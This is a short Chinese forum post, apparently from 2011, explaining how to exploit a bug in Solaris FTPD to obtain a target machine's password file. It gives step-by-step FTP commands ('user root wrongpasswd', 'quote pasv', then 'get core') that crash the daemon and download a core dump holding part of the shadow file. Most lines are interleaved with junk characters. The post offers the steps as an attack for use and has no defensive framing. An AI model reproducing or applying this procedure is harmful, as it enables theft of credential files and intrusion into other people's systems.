该方法利用了Solaris 操作系统中FTPD的一个BUG,使得用户可以获得该机的口令文件。具体过程如下:: e- @7 U" m4 h" u
' @# r/ h {/ l. H1 D
1.通过 ftp 正常登录到目的主机上
$ m& W9 b+ M7 B) b/ `( l: C a0 b Y8 h
q/ B; w3 O" p p$ o2.输入如下命令序列:4 G. ^2 z J4 c& ?
. o: h8 m9 W+ G! i; K3 d5 uftp> user root wrongpasswd# S, h5 G* H X2 h5 u5 @1 [
) w8 x" s, a9 A1 i( y# F2 tftp> quote pasv
; f7 S ^' ?% H5 x
8 A) a6 r6 r1 C4 f3.这时,ftpd会报错退出,同时会在当前目录下生成一个core,口令文件就包含在这个core中。! U# j) r9 T0 e" l! N5 i
( N% f. r3 S' |3 A4.再次进入FTP >get core
. S* `3 U. e7 p$ ]6 _; y5 {& H; O* \- U, R, n2 _/ [
补充:虽然在core只有一部分shadow,但是对于系统来说已经是致命的打击了
1 E B& a% z% o$ f. m
0 V3 ?9 L: \( k& a+ ?# B3 J |
|本地广告联系: QQ:905790666 TEL:13176190456|Archiver|手机版|小黑屋|汶上信息港
( 鲁ICP备19052200号-1 )
发表于 2011-1-12 21:01:38
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡